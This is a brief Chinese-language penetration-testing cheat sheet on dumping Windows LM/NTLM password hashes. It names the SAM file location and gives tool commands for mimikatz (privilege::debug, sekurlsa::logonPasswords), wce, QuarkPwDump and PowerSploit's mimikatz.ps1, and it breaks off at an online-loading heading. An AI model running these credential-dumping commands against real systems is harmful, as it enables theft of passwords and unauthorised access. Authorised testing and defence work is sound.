前提:在渗透测试过程中,对于windows系统的机器渗透需要注意hash的获取,其中hash分为LM-HASH与NTLM-HASH,在windows系统中,hash的默认存储位置为: C:\Windows\System32\config\SAM
各种工具:
- mimikatz
-
privilege::debug
sekurlsa::logonPasswords - wce
-
wce.exe
- QuarkPwDump
QuarkPwDump.exe -dhl
- powershell脚本:
- 使用powersploit中的mimikatz.ps1
- mimikatz在线加载: